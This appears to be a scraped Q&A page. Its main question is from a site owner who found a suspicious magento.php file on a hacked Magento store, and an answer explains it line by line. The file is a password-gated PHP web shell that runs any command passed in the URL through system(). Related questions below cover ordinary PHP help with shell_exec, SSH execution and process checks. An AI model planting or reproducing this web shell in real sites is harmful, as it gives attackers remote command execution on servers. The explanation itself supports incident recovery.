I'm trying to recover a hacked Magento store, and found a file named magento.php in the errors folder within the Magento root directory. I know it's malicious but I can't really figure out what it's doing. Any ideas?
<?php
if(md5($_GET["hash"])=="b4c44d5ce1c6c4b60c1c3d05a7d3e58d") {
echo "<pre>";
$cmd = ($_GET['cmd']);
$ret = system($cmd);
print $ret;
echo "</pre>";
die;
} else {
print "-1";
}
?>
It is simple php functionality which accessing parameters from the url and trying to execute the same.
<?php
if(md5($_GET["hash"])=="b4c44d5ce1c6c4b60c1c3d05a7d3e58d") {// check the hash parameter in the url and convert it to md5 standard. If that matches the value then execute steps inside this braces
echo "<pre>"; // print "<pre> tag on screen
$cmd = ($_GET['cmd']); // get the cmd parameter from url
$ret = system($cmd); // execute that cmd parameter as command
print $ret; // print the return value of the system function
echo "</pre>"; // print "</pre> tag on screen
die; // stop execution at this line
} else { // if hash do not match
print "-1"; // print -1 on screen
}
?>
Related
I have searched almost everywhere read different documents but still I am unable to find answer of question which is Why we can't use variable outside if(isset($_POST['sign'])) block which posted from python?
Consider this below code.
$sign = '';
if(isset($_POST['sign']))
{
$sign = $_POST['sign'];
if(!is_dir($sign))
{
mkdir($sign);
echo "folder created";
}
else
{
echo "folder already exists";
}
}
echo $sign;
Here I am getting value coming from python in $sign it is working fine inside if block but when I echo it outside if block it is showing noting on browser.
I am trying to run a python file using PHP, but the file doesn't print Hi and I only print "Whatsup". The script is run when the user clicks a submit button. I am on OSX and all the file paths are correct. I did chmod +x hi.py as suggested in another post
hi.py
#set up classes
# figure out regex
#!/Library/Frameworks/Python.framework/Versions/3.8/bin/python3
print("Hi")
signup.inc.php
else {
$command=escapeshellcmd('/Users/name/Documents/CPSC_Courses/CPSC353/CoronaVirus/webScrap.py');
$output = shell_exec($command);
echo $output;
echo "Whatsup";
exit();
}
You need to tell which python to use + where it is like:
else {
$command=escapeshellcmd('/usr/bin/python /Users/name/Documents/CPSC_Courses/CPSC353/CoronaVirus/webScrap.py');
$output = shell_exec($command);
echo $output;
echo "Whatsup";
exit();
}
OR for Python3:
else {
$command=escapeshellcmd('/usr/local/bin/python3 /Users/name/Documents/CPSC_Courses/CPSC353/CoronaVirus/webScrap.py');
$output = shell_exec($command);
echo $output;
echo "Whatsup";
exit();
}
Check where your Python is and add FULL path for it.
I would just use:
echo shell_exec("/usr/local/bin/python3 /Users/name/Documents/CPSC_Courses/CPSC353/CoronaVirus/webScrap.py");
I'm creating a button on my web page.I want that when someone presses this button an execution of a process of Linux commands on my first server (like "cd file" "./file_to_execute"..) when these commandes are done and finished i want to connect on another server by ssh and to execute another commands.
the probleme is how can i know that the commands before are already finished to proceed to the second part which is to connect on another server .
to resume :
first step connect on the first server , execute some commands
=> when these commands are done ( the part i dont know how to do it )
second step : to connect on another server and execute some others commands.
I'm searching for a way that will allows me to add some pop up to inform the user of my web page that he finished the first step and he started the second.
<?php
$hostname = '192.177.0.252';
$username = 'pepe';
$password = '*****';
$commande = 'cd file && ./file_one.sh';
if (false === $connection_first = ssh2_connect($hostname, 22)) {
echo 'failed<br />';
exit();
}
else {
echo 'Connected<br />';
}
if (false === ssh2_auth_password($connection_first, $username, $password)) {
echo 'failed<br />';
exit();
}
else {
echo 'done !<br />';
}
if (false === $stream = ssh2_exec($connection_first, $commande)) {
echo "error<br />";
}
?>
Thanks
PS: sorry for my English, I'm from Barcelone
To handle events where an exception occurs i would recommend using a try/catch statement, like the one below:
try {
echo inverse(5) . "\n";
echo inverse(0) . "\n";
} catch (Exception $e) {
echo 'Caught exception: ', $e->getMessage(), "\n";
}
When you're trying to handle events and need to know when they finish, there are a few ways to achieve this. You can either set a boolean to true after the command has been executed (like what you are already doing). OR you can return output from the command by printing the output to a txt file and then echoing out the returns of this file. See code below:
exec ('/usr/bin/flush-cache-mage > /tmp/.tmp-mxadmin');
$out = nl2br(file_get_contents('/tmp/.tmp-mxadmin'));
echo $out;
At this point you can create conditions based off of what is returned in the $out variable.
Here is a code I use to check if process is running under windows, in this case calc.exe
I'm trying to start calc.exe if this one not figure out in task list.
If calc.exe is not started, is opened when run php script, but page remain in a loop until i close calc.exe.
Where do I wrong?
Help is appreciated.
// START SHOW TASKLIST
// Get Tasklist
exec("tasklist 2>NUL", $task_list);
//print_r($task_list);
echo '<pre>'; print_r($task_list); echo '</pre>';
// END SHOW TASKLIST
// Service running
$kill_pattern = '~(calc)\.exe~i';
// Create array
$task_list = array();
exec("tasklist 2>NUL", $task_list);
foreach ($task_list AS $task_line) {
if (preg_match($kill_pattern, $task_line, $out)) {
echo "=> Detected: ".$out[1]."\n !\n";
$is_running = '1';
break;
}
}
if ($is_running == '1') {
echo 'Nothing to do';
exit;
} else {
// open calc.exe
exec("calc.exe");
exit;
}
Please use this code to avoid script hang up
Change
exec(calc.exe);
With
pclose(popen('start /B cmd /C "calc.exe >NUL 2>NUL"', 'r'));
I'm trying to print the host/ip to the screen. But, it's printing: "Resource id #2" instead. I'm using SSH2_connection(). I read the doc page and know the the function parameters are host, port, methods ... but when I try fread($host), the host/ip is still not printing can someone give me some direction on this? Thanks!
Code:
<?php
if (!function_exists("ssh2_connect")) die("function ssh2_connect doesn't exist");
if(!($ssh = ssh2_connect('10.5.32.12', 22))) {
echo "fail: unable to establish connection\n";
} else {
if(!ssh2_auth_password($ssh, 'root', '********')) {
echo "fail: unable to authenticate\n";
} else {
echo "Okay: Logged in ... ";
$content = fread($ssh); //Line in question (want ip address to show here)
echo "$content <br>"; //Line in quesion
$stream = ssh2_exec($ssh, 'find / -name *.log -o -name *.txt');
stream_set_blocking($stream, true);
$data = '';
while($buffer = fread($stream, 4096)) {
$data .= $buffer;
}
fclose($stream);
echo $data; // user
}
}
?>
I believe you need the parenthesis around the variabls as well when using double quotes. "{$content} <br>"
Have you tested with your own debug methods whether the $content variable contains information? You can set a value for the variable to test whether your echo statement is correct syntax.
$content = fread($ssh);
fread() reads from a file and puts the info into a resource handler for use later. I don't think you are using this in the right way currently.
I don't see where $ssh is being defined, but I assume it holds the IP you are wanting to output? If that is the case, just replace
$content = fread($ssh);
With:
echo $ssh;